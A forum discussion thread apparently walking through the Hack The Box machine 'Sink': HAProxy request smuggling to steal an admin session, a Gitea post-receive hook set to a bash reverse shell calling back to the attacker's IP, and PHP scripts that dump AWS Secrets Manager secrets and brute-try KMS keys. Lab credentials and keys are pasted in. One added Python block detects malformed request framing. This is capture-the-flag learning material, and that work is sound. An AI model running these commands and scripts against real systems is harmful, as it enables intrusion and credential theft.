TUTORIAL SINK [DISCUSSION]
by 0xvijay - January 31, 2021 at 07:50 AM
#1
I opened this thread to discuss sink.htb

quick nmap

22 - ssh
3000 - gitea
5000 - devops

And let's discuss this below

sounds like http smuggling
Reply
#2
Yes, it looks like http smuggling. Also there is a WAF which is preventing us from bruteforcing and enumeration...
Reply
#3
curl -X POST -v http://10.10.10.225:5000/ -I -H 'User-Agent: Mozilla/5.0' -H 'Content-Length Kuku: 95'

HTTP/1.0 400 Bad request
< Server: haproxy 1.9.10
Server: haproxy 1.9.10

https://nathandavison.com/blog/haproxy-h...-smuggling
Reply
#4
Any updates with the foothold? I noticed that request smuggling vuln but I don't know what to do with it or how it can be used to give useful information.
Can someone at least confirm if it is the way to go?
Reply
#5
i got the first step:

1. turn on burp and listen to HTTP
2. register
3. send a comment
4. send the request to repeater
5. edit the request, so it looks like this:
[Image: xv36ioy.png]

In order to get the 0b in the chunked header:
1. write the base64 string "Cwo="  before chunked (in the Transfer-Encoding header)
2. press Ctrl + Shift + b  (this will base64 decode it)

after you send this request (only 1 time), the admin will make a request.
the request headers of the admin's request can be read as a comment on the page /home
these will include the admin's session key, which you can use to identify as admin

these are the notes you can read as admin, if you change your session key to the admin session key:
Chef Login : http://chef.sink.htb Username : chefadm Password : /6'fEGC&zEx{4]zz
Dev Node URL : http://code.sink.htb Username : root Password : [email protected]>Z3})zzfQ3
Nagios URL : https://nagios.sink.htb Username : nagios_adm Password : g8<H6GK\{*L.fB3C
Reply
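The foothold above relies on the front end and the back end disagreeing about how the request body is framed once the Transfer-Encoding value is padded with a control byte. The following is an added example from a defender's side, not code from the thread or from the box: it parses a raw request and lists the framing problems a strict front end (reverse proxy, WAF, or log-review script) should reject or alert on. The sample requests and the Host value are constructed for the example.

```python
import re
from typing import List, Tuple

# RFC 7230 "tchar": the only characters allowed in a transfer-coding token.
TCHAR = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")

def parse_headers(raw: bytes) -> List[Tuple[str, str]]:
    """Return (name, value) pairs from the header block of a raw HTTP request.

    Only SP and HTAB are stripped around the value, as a strict parser does;
    any other control byte (such as 0x0b) stays in the value so it can be flagged.
    """
    head = raw.split(b"\r\n\r\n", 1)[0]
    headers = []
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        if b":" not in line:
            continue
        name, value = line.split(b":", 1)
        headers.append((name.decode("latin-1").strip().lower(),
                        value.decode("latin-1").strip(" \t")))
    return headers

def framing_findings(raw: bytes) -> List[str]:
    """List reasons a strict front end should reject the request's message framing."""
    findings = []
    headers = parse_headers(raw)
    te_values = [v for n, v in headers if n == "transfer-encoding"]
    cl_values = [v for n, v in headers if n == "content-length"]
    for value in te_values:
        for coding in value.split(","):
            coding = coding.strip(" \t")
            if not TCHAR.match(coding):
                findings.append(f"malformed transfer-coding {coding!r}")
            elif coding.lower() != "chunked":
                findings.append(f"unsupported transfer-coding {coding!r}")
    if te_values and cl_values:
        findings.append("both Content-Length and Transfer-Encoding present (CL.TE ambiguity)")
    if len(set(cl_values)) > 1:
        findings.append("conflicting Content-Length values")
    return findings

# Constructed sample requests (not captured from the box).
CLEAN = (b"POST /comment HTTP/1.1\r\nHost: example.test\r\n"
         b"Content-Length: 5\r\n\r\nhello")
OBFUSCATED_TE = (b"POST /comment HTTP/1.1\r\nHost: example.test\r\n"
                 b"Content-Length: 4\r\nTransfer-Encoding: \x0bchunked\r\n\r\n"
                 b"0\r\n\r\n")
```

Running `framing_findings` over both samples returns nothing for the clean request and two findings for the obfuscated one: the non-token transfer-coding and the simultaneous Content-Length/Transfer-Encoding pair that makes the two parsers disagree.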
#6
jeez! i had the correct payload all that time but i didn't know about that encoding/obfuscation step before chunked. Thanks man that is so helpful
Reply
#7
*spoiler* rabbithole:
gitea exploit to get rev shell:
https://www.fzi.de/en/news/news/detail-e...h-authent/

login as root in sink.htb:3000 password: [email protected]>Z3})zzfQ3
go to sink.htb:3000/root/Kinesis_ElasticSearch/settings/hooks/git
edit post-receive hook to reverse shell:

#!/bin/bash
bash -i >& /dev/tcp/YOUR_IP/9001 0>&1

start nc listener
push anything to the kinesis elasticsearch project (new file > commit changes)
profit

to get marcus id_rsa (after logging in to sink.htb:3000 as root with password [email protected]>Z3})zzfQ3) you have to just
visit: sink.htb:3000/root/Key_Management/commit/b01a6b7ed372d154ed0bc43a342a5e1203d07b1e


ok root is a bit tricky...
i used php for this, but there are other tools to enumerate aws

the stuff from the gitea repos is hinting that we should enumerate port 4566...
what i did:

1. download the repo at sink.htb:3000/root/Key_Management
2. create tunnel: ssh -N -L 4566:127.0.0.1:4566 -i id_rsa [email protected]
3. enumerate aws services: curl localhost:4566/health
4. create php files in the Key_Management repo to enumerate aws services (run php code like this: php file.php):
4.1 list secrets:
<?php
require 'vendor/autoload.php';

use Aws\SecretsManager\SecretsManagerClient;
use Aws\Exception\AwsException;

$client = new SecretsManagerClient([
        'region' => 'eu',
        'endpoint' => 'http://127.0.0.1:4566',
        'credentials' => [
                'key' => 'AKIAIUEN3QWCPSTEITJQ',
                'secret' => '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'
        ],
        'version' => 'latest'
]);

try {
    // list every secret stored behind the local Secrets Manager endpoint
    $result = $client->listSecrets(array());
    var_dump($result);
} catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}

4.2 get secret values:
<?php
require 'vendor/autoload.php';

use Aws\SecretsManager\SecretsManagerClient;
use Aws\Exception\AwsException;

$client = new SecretsManagerClient([
        'region' => 'eu',
        'endpoint' => 'http://127.0.0.1:4566',
        'credentials' => [
                'key' => 'AKIAIUEN3QWCPSTEITJQ',
                'secret' => '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'
        ],
        'version' => 'latest'
]);

// the ARNs returned by listSecrets in step 4.1
$secretIDs = ["arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-zwTEL",
    "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-yLXAA",
    "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-nAWmk"];

try {
    for ($i = 0; $i < count($secretIDs); $i++) {
        $result = $client->getSecretValue(array(
            'SecretId' => $secretIDs[$i],
        ));
        var_dump($result);
    }
} catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}

5. in the secret values you find the creds of david = EALB=bcC=`a7f2#k
6. find the file /home/david/Projects/Prod_Deployment/servers.enc
7. we can decrypt the file with a key that is stored in aws.
so we list the keys first with the php script called listkeys.php, which is already in the repo (first you must modify it so the version is "latest")
command: php listkeys.php | grep "string(36)" | cut -d " " -f 10
8. create another php script to decrypt the file (i used base64 to encode and decode the file):
<?php
require 'vendor/autoload.php';

use Aws\Kms\KmsClient;
use Aws\Exception\AwsException;

$KmsClient = new Aws\Kms\KmsClient([
    'profile' => 'default',
    'version' => '2014-11-01',
    'region' => 'eu',
    'endpoint' => 'http://127.0.0.1:4566'
]);

// key ids collected with listkeys.php in step 7
$keys = ["0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
    "16754494-4333-4f77-ad4c-d0b73d799939",
    "2378914f-ea22-47af-8b0c-8252ef09cd5f",
    "2bf9c582-eed7-482f-bfb6-2e4e7eb88b78",
    "53bb45ef-bf96-47b2-a423-74d9b89a297a",
    "804125db-bdf1-465a-a058-07fc87c0fad0",
    "837a2f6e-e64c-45bc-a7aa-efa56a550401",
    "881df7e3-fb6f-4c7b-9195-7f210e79e525",
    "c5217c17-5675-42f7-a6ec-b5aa9b9dbbde",
    "f0579746-10c3-4fd1-b2ab-f312a5a0f3fc",
    "f2358fef-e813-4c59-87c8-70e50f6d4f70"];

// servers.enc, base64-encoded so it can be pasted into the script
$cipherb64 = "mXMs+8ZLEp9krGLLJT2YHLgHQP/uRJYSfX+YTqar7wabvOQ8PSuPwUFAmEJh86q3kaURmnRxr/smZvkU6Pp0KPV7ye2sP10hvPJDF2mkNcIEVif3RaMU08jZi7U/ghZyoXseM6EEcu9c1gYpDqZ74CMEh7AoasksLswCJJZYI0TfcvTlXx84XBfCWsK7cTyDb4SughAq9MY89Q6lt7gnw6IwG/tSHi9a1MY8eblCwCMNwRrFQ44x8p3hS2FLxZe2iKUrpiyUDmdThpFJPcM3uxiXU+cuyZJgxzQ2Wl0Gqaj0RpVD2w2wJGrQBnCnouahOD1SXT3DwrUMWXyeNMc52lWo3aB+mq/uhLxcTeGSImHJcfUYYQqXoIrOHcS7O1WFoaMvMtIAl+uRslGVSEwiU6sVe9nMCuyvrsbsQ0N46jjro5h1nFmTmZ0C1Xr97Go/pHmJxgG1lxnOepsglLrPMXc5F6lFH1aKxlzFVAxGKWNAzTlzGC+HnBXjugLpP8Shpb24HPdnt/fF/dda8qyaMcYZCOmLODums2+ROtrPJ4CTuaiSbOWJuheQ6U/v5AbeQSF93RF28iyiA905SCNRi3ejGDH65OWv6aw1VnTf8TaREPH5ZNLazTW5Jo8kvLqJaEtZISRNUEmsJHr79U1VjpovPzePTKeDTR0qosW/GJ8=";

// try every key: enable it first, then attempt the decrypt;
// a key that cannot decrypt the blob throws and is simply skipped
for ($i = 0; $i < count($keys); $i++) {
    try {
        $result = $KmsClient->enableKey([
            'KeyId' => $keys[$i],
        ]);

        $result = $KmsClient->decrypt([
            'CiphertextBlob' => base64_decode($cipherb64),
            'KeyId' => $keys[$i],
            'EncryptionAlgorithm' => 'RSAES_OAEP_SHA_256',
        ]);
        // only the matching key reaches this line; print the plaintext base64-encoded
        echo base64_encode($result["Plaintext"]);
    } catch (AwsException $e) {
        // wrong key for this blob, move on to the next one
    }
}

9. now you can decode the base64 and extract the given file:
echo -n "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" | base64 -d > servers.gz
gzip -d servers.gz
tar -xf servers
cat servers.yml

the root password is in the extracted file
Reply
#8
--------bump--------
Reply
#9
can you share the code you used to decrypt? I'm struggling to get mine to work - one key does give a result on decrypt but I only get gibberish back for the Plaintext - sending the file both as base64 encoded and binary - can't get it to work either way.

I was previously trying the awslocal kms cli but no luck there either - this step is killing me since it seems so finicky
Reply
#10
the code is in step 8.
you need to download the php repo and put my script into this folder
then execute it
Reply
#11
the aws key and secret can be found in the Log_Management repo's commits
Reply
#12
(February 01, 2021 at 07:55 PM)randomname83 Wrote: i got the first step:

1. turn on burp and listen to HTTP
2. register
3. send a comment
4. send the request to repeater
5. edit the request, so it looks like this:
[Image: xv36ioy.png]

In order to get the 0b in the chunked header:
1. write the base64 string "Cwo="  before chunked (in the Transfer-Encoding header)
2. press Ctrl + Shift + b  (this will base64 decode it)

after you send this request (only 1 time), the admin will make a request.
the request headers of the admin's request can be read as a comment on the page /home
these will include the admin's session key, which you can use to identify as admin

these are the notes you can read as admin, if you change your session key to the admin session key:
Chef Login : http://chef.sink.htb Username : chefadm Password : /6'fEGC&zEx{4]zz
Dev Node URL : http://code.sink.htb Username : root Password : [email protected]>Z3})zzfQ3
Nagios URL : https://nagios.sink.htb Username : nagios_adm Password : g8<H6GK\{*L.fB3C

Hi bro, thanks for sharing.

I wondered where the CSRF token should come from, as there is no CSRF token set when I use the app and post comments/notes. Furthermore, how did you actually find out which payload to send in the chunked request? I get the logic of bypassing the WAF with the smuggling, but I don't get the logic behind the smuggled request and why it ends up making the admin do a request that lands in the comments.

Maybe you can explain? Thx
Reply
